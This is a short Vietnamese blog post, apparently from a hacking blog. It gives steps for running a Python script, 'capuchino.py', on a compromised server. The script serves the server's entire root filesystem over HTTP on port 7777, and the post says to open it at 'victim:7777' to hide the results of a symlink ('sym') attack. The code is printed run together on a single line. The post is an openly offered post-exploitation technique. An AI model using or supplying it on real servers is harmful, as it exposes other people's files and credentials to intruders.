dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python# Bypass for (c) 2013import SimpleHTTPServerimport SocketServerimport osport = 7777if __name__=='__main__':os.chdir('/')Handler = SimpleHTTPServer.SimpleHTTPRequestHandlerhttpd = SocketServer.TCPServer(("", port), Handler)print("Now open this server on webbrowser at port : " + str(port))print("example: http://maho.com:" + str(port))httpd.serve_forever()
Sau đó chạy nó python capuchino.py
rồi kiểm tra kết quả :victim:7777
Cách này có thể giấu đc kết quả thực hiện sym trên server
Không có nhận xét nào:
Đăng nhận xét